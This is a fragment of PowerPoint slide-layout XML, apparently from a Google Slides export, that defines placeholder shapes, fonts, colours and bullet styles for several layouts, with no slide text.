                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p19"/>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p:cSld name="Custom Layout">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="195" name="Shape 195"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="1518375"/>
            <a:ext cx="7914300" cy="2676300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p20"/>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Page 1">
  <p:cSld name="10_Title and Content_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="20" name="Shape 20"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Google Shape;21;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284525" y="1512841"/>
            <a:ext cx="6575100" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="27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22" name="Google Shape;22;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284525" y="2070619"/>
            <a:ext cx="6575100" cy="2027700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6CADDF"/>
                </a:solidFill>
                <a:latin typeface="Inter SemiBold"/>
                <a:ea typeface="Inter SemiBold"/>
                <a:cs typeface="Inter SemiBold"/>
                <a:sym typeface="Inter SemiBold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;23;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
